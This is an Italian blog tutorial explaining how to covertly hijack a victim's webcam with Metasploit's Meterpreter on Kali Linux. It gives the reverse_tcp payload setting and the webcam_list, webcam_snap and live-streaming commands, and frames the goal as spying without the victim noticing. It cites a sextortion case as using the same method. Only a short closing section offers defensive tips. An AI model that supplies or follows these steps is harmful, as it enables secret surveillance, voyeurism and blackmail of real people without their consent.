Come Hackerare le Webcam

In questo tutorial, guarderemo come possiamo entrare in una webcam in segreto e in remoto tramite Internet e dare un’occhiata a quello che sta succedendo dall’altro lato. Utilizziamo il potente Meterpreter e Kali Linux per attaccare la webcam della vittima. Prenderemo pieno controllo della webcam, l’accenderemo, faremo foto e potremo anche trasmettere video in diretta senza che nessuno lo scopri.

All’inizio del 2014, un hacker è stato condannato a 18 mesi per aver fatto proprio questo a Miss Teen USA 2013. Ha trovato una vulnerabilità nel suo computer (come un software obsoleto), ha preso alcune foto compromettenti dalla webcam e ha ricattato la vittima per inviare più fotografie. Il metodo utilizzato è esattamente quello che cercheremo qui.

Il nostro grande amico meterpreter ci aiuterà con questo hack. Con Meterpreter possiamo controllare la webcam di qualcuno, installare un keylogger o piantare i propri virus, rubare dati privati ​​e fare praticamente tutto sul computer della vittima.

Per questo tutorial, suppongo che tu abbia già utilizzato un modulo di attacco per sfruttare una vulnerabilità con Metasploit.

Come hackerare le webcam?

Step 1: Impostare Meterpreter

Dopo aver exploitato con successo la vittima, abbiamo ora la possibilità di impostare un payload a nostra scelta. Il payload dice a metasploit cosa fare sul computer della vittima una volta che entra. Meterpreter è il nostro payload. Il seguente comando imposta il nostro payload:

set payload windows/meterpreter/reverse_tcp

Se l’attacco è riuscito, metasploit installa automaticamente meterpreter sul sistema di destinazione e possiamo passare all’hacking della webcam.

Step 2: Trovare la Webcam

Meterpreter dispone di un modulo integrato per la ricerca e il controllo della webcam del sistema remoto. Possiamo iniziare cercando se il sistema ha anche una webcam o no. Il comando riportato di seguito viene utilizzato per questo, restituisce anche il nome della webcam.

meterpreter > webcam_list

E ora dovresti poter vedere la/le webcam del bersaglio nell’output.

Step 3: Fai Foto

Se l’ultimo comando ci ha lasciato la webcam possiamo provare a scattare una foto:

meterpreter > webcam_snap

Ed ora dovresti vedere una foto salvata nella cartella /opt/framework3/msf3

Step 4: Guarda lo streaming in tempo reale dalla webcam hackerata

Abbiamo appena fatto una foto, proviamo ad avviare uno streaming in diretta. Possiamo farlo scrivendo questo comando: (Stiamo usando il parametro –p per specificare la cartella dove vogliamo l’output del file video)

meterpreter > run webcam -p /var/www

Questo comando attiva la webcam della vittima e invia la sua uscita video a /var/www/webcam.htm. Puoi aprire questo file e verificare cosa succede all’altra estremità in un flusso video in diretta.

Come evitare che la tua Webcam sia hackerata?

Ci sono diversi modi per entrare nelle webcams. Nell’esempio precedente, con alcuni piccoli comandi possiamo sbirciare dalla webcam della nostra vittima. Qualsiasi esperto di sicurezza esperto ti dirà che nessun sistema è completamente sicuro. Questo è il motivo per cui dovresti sempre coprire le webcam quando non le stai usando.

Ma questo non significa che non dovresti preoccuparti di aggiornare il sistema operativo e le applicazioni, è proprio il contrario. Se un hacker può ottenere il controllo della tua webcam, il tuo sistema è stato exploitato con successo, è effettivamente un bot, uno schiavo dell’attaccante. Ciò significa che l’attaccante può fare qualsiasi cosa sul tuo sistema: accedere ai tuoi dati privati, vedere qualsiasi tipo di testo e tutti i siti web che visiterai.

Qual è il dispositivo che stai utilizzando in questo momento? Uno smartphone? Un computer portatile? Probabilmente stai fissando direttamente una telecamera. Ti senti improvvisamente un po’ a disagio? Dovresti. Non prendete alcuna possibilità. Se semplicemente copri le tue telecamere e aggiorni regolarmente tutto il tuo software puoi evitare di essere vittima di un exploit.

Annunci

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione /  Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione /  Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione /  Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione /  Modifica )

w

Connessione a %s...

Create a website or blog at WordPress.com

Su ↑

%d blogger hanno fatto clic su Mi Piace per questo: